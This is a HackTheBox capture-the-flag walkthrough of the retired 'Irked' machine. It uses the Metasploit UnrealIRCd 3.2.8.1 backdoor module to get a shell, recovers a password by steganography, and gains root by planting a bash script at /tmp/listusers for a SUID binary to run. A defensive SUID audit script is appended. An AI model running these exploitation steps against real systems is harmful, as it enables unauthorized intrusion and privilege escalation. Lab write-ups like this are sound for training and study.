HackTheBox - Irked

Summary

Irked, a Linux box created by HackTheBox user MrAgent, was an easy-difficulty box overall. It revolved around finding an exploit for the IRC service to get a low-privilege shell. Once we have a shell, a hint on the box points us toward steganography, which gives us a password we can use to get user. Root on this box was about finding a non-standard SUID binary that executes whatever is in /tmp/listusers.

Enumeration

Scanning The Network

nmap Scan

$ nmap -sC -sV 10.10.10.117

Checking the web server, we only see the emoji on the index page.
Running dirbuster also results in no routes.
I download the image:

$ wget http://10.10.10.117/irked.jpg

Let's check UnrealIRCd.
Checking it in searchsploit, we see that version 3.2.8.1 has a Backdoor Command Execution.

Exploiting the Server

Let's fire up Metasploit and see if we can get command execution on the IRC server.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.10.10.117
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

Running this gives us a shell, so let's get a better TTY shell by running:

python -c 'import pty;pty.spawn("/bin/bash");'

Privilege Escalation to Become User

Running **ls -la** in /home/djmardov/Documents, we find a .backup file that looks interesting, and we also see that we cannot read user.txt yet. Cat-ing the file, we see the message:

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

So the password is related to steganography. Steghide is the most common steganography tool that uses a password.

Trying UPupDOWNdownLRlrBAbaSSss as the passphrase on the irked.jpg image, which is on the index page, gives us the password.

steghide extract -sf irked.jpg

Kab6h+m+bbp2J:HG

This yields a pass.txt, which contains the password.
Let's try to su to djmardov using it as the password.

$ su djmardov
Password: Kab6h+m+bbp2J:HG
$ cat djmardov/Documents/user.txt

Now that we own user, let's move on to privilege escalation to root.

Privilege Escalation to Root

Searching for binaries with the SUID bit set shows us these files:

$ find / -perm -u=s -type f 2>/dev/null

/tmp/listusers/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

We can see that /usr/bin/viewuser is a non-standard Linux binary.
Executing the binary, we see that it tries to execute /tmp/listusers, which is not found.

Let us create that file with a shell in it, as shown:

#!/bin/bash
/bin/bash

Re-executing the binary now gives us a shell as root, so we can read root.txt.
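
Seen from the defender's side, the viewuser flaw is a SUID binary that runs a path under a world-writable directory. As an added example (not part of the original write-up), this shell audit lists SUID files with the same find test used above and flags any that embed a path under /tmp, /var/tmp or /dev/shm. The function names and the sample files built in demo are constructed for illustration.

```shell
#!/bin/sh
# Added example: heuristic audit of SUID binaries for embedded paths that
# live in world-writable directories. A hit means "review this binary",
# not proof that the path is executed.

# Print each distinct path literal under /tmp, /var/tmp or /dev/shm that
# appears in the bytes of file $1. grep -a reads the binary as text and
# -o prints only the matched literal.
writable_refs() {
    LC_ALL=C grep -a -o -E '/(tmp|var/tmp|dev/shm)/[A-Za-z0-9._/-]+' "$1" \
        2>/dev/null | sort -u
}

# Walk the tree rooted at $1 (default /) without crossing filesystems and
# print "<suid binary>: <referenced path>" for every finding.
audit_suid() {
    find "${1:-/}" -xdev -perm -u=s -type f 2>/dev/null |
    while IFS= read -r bin; do
        writable_refs "$bin" | while IFS= read -r ref; do
            printf '%s: %s\n' "$bin" "$ref"
        done
    done
}

# Constructed sample: two fake SUID files in a scratch directory. Only the
# one carrying the /tmp/listusers literal should be reported.
demo() {
    d=$(mktemp -d) || return 1
    printf '\177ELF\001setuid\001/tmp/listusers\001' > "$d/viewuser"
    printf '\177ELF\001/etc/passwd\001' > "$d/passwd"
    chmod 4755 "$d/viewuser" "$d/passwd"
    audit_suid "$d"
    rm -rf "$d"
}
```

Run `audit_suid /` as root on a host to review its SUID set; any binary reported deserves a closer look at how it uses the referenced path.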

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/irked/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.